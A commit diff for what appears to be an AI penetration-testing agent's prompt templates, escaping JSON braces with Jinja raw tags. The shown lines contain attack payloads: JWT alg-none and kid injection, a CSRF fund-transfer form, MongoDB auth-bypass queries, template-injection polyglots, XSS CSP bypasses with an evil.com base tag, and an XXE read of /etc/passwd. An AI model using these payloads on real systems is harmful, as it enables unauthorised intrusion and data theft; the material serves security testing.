Adding full support for gpt-5 models (#5)

strix/prompts/vulnerabilities/authentication_jwt.jinja

@@ -5,8 +5,8 @@
 
 <jwt_structure>
 header.payload.signature
-- Header: {"alg":"HS256","typ":"JWT"}
-- Payload: {"sub":"1234","name":"John","iat":1516239022}
+- Header: {% raw %}{"alg":"HS256","typ":"JWT"}{% endraw %}
+- Payload: {% raw %}{"sub":"1234","name":"John","iat":1516239022}{% endraw %}
 - Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
 </jwt_structure>
 
@@ -19,7 +19,7 @@ RS256 to HS256:
 </algorithm_confusion>
 
 <none_algorithm>
-- Set "alg": "none" in header
+- Set {% raw %}"alg": "none"{% endraw %} in header
 - Remove signature completely (keep the trailing dot)
 </none_algorithm>
 
@@ -28,16 +28,16 @@ Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-b
 </weak_secrets>
 
 <kid_manipulation>
-- SQL Injection: "kid": "key' UNION SELECT 'secret'--"
-- Command injection: "kid": "|sleep 10"
-- Path traversal: "kid": "../../../../../../dev/null"
+- SQL Injection: {% raw %}"kid": "key' UNION SELECT 'secret'--"{% endraw %}
+- Command injection: {% raw %}"kid": "|sleep 10"{% endraw %}
+- Path traversal: {% raw %}"kid": "../../../../../../dev/null"{% endraw %}
 </kid_manipulation>
 </common_attacks>
 
 <advanced_techniques>
 <jwk_injection>
 Embed public key in token header:
-{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
+{% raw %}{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}{% endraw %}
 </jwk_injection>
 
 <jku_manipulation>

strix/prompts/vulnerabilities/csrf.jinja

@@ -48,7 +48,7 @@ HTML form auto-submit:
 <json_csrf>
 For JSON endpoints:
 <form enctype="text/plain" action="https://target.com/api">
-  <input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
+  <input name='{% raw %}{"amount":1000,"to":"attacker","ignore":"{% endraw %}' value='"}'>
 </form>
 </json_csrf>
 

strix/prompts/vulnerabilities/idor.jinja

@@ -15,7 +15,7 @@
 
 <advanced_enumeration>
 - Boundary values: 0, -1, null, empty string, max int
-- Different formats: {"id":123} vs {"id":"123"}
+- Different formats: {% raw %}{"id":123} vs {"id":"123"}{% endraw %}
 - ID patterns: increment, decrement, similar patterns
 - Wildcard testing: *, %, _, all
 - Array notation: id[]=123&id[]=456
@@ -51,7 +51,7 @@ for i in range(1, 10000):
 <type_confusion>
 - String where int expected: "123" vs 123
 - Array where single value expected: [123] vs 123
-- Object injection: {"id": {"$ne": null}}
+- Object injection: {% raw %}{"id": {"$ne": null}}{% endraw %}
 </type_confusion>
 </exploitation_techniques>
 
@@ -106,7 +106,7 @@ query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
 
 <websocket_idor>
 Subscribe to other users' channels:
-{"subscribe": "user_456_notifications"}
+{% raw %}{"subscribe": "user_456_notifications"}{% endraw %}
 </websocket_idor>
 
 <file_path_idor>

strix/prompts/vulnerabilities/rce.jinja

@@ -94,7 +94,7 @@ ${IFS}id
 <polyglot_payloads>
 Works in multiple contexts:
 ;id;#' |id| #" |id| #
-${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
+{% raw %}${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}{% endraw %}
 </polyglot_payloads>
 
 <blind_rce>

strix/prompts/vulnerabilities/sql_injection.jinja

@@ -152,9 +152,9 @@ PostgreSQL:
 
 <nosql_injection>
 <mongodb>
-{"username": {"$ne": null}, "password": {"$ne": null}}
-{"$where": "this.username == 'admin'"}
-{"username": {"$regex": "^admin"}}
+{% raw %}{"username": {"$ne": null}, "password": {"$ne": null}}{% endraw %}
+{% raw %}{"$where": "this.username == 'admin'"}{% endraw %}
+{% raw %}{"username": {"$regex": "^admin"}}{% endraw %}
 </mongodb>
 
 <graphql>

strix/prompts/vulnerabilities/xss.jinja

@@ -9,7 +9,7 @@
 - Headers: User-Agent, Referer, X-Forwarded-For
 - Cookies (if reflected)
 - File uploads (filename, metadata)
-- JSON endpoints: {"user":"<payload>"}
+- JSON endpoints: {% raw %}{"user":"<payload>"}{% endraw %}
 - postMessage handlers
 - DOM properties: location.hash, document.referrer
 - WebSocket messages
@@ -97,7 +97,7 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</
 
 <csp_bypasses>
 - JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
-- AngularJS: {{constructor.constructor('alert(1)')()}}
+- AngularJS: {% raw %}{{constructor.constructor('alert(1)')()}}{% endraw %}
 - Script gadgets in allowed libraries
 - Base tag injection: <base href="//evil.com/">
 - Object/embed: <object data="data:text/html,<script>alert(1)</script>">
@@ -145,7 +145,7 @@ navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
 </markdown>
 
 <react_vue>
-- dangerouslySetInnerHTML={{__html: payload}}
+- dangerouslySetInnerHTML={% raw %}{{__html: payload}}{% endraw %}
 - v-html directive bypass
 </react_vue>
 

strix/prompts/vulnerabilities/xxe.jinja

@@ -91,7 +91,7 @@ evil.dtd:
 
 <specific_contexts>
 <json_xxe>
-{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
+{% raw %}{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}{% endraw %}
 </json_xxe>
 
 <soap_xxe>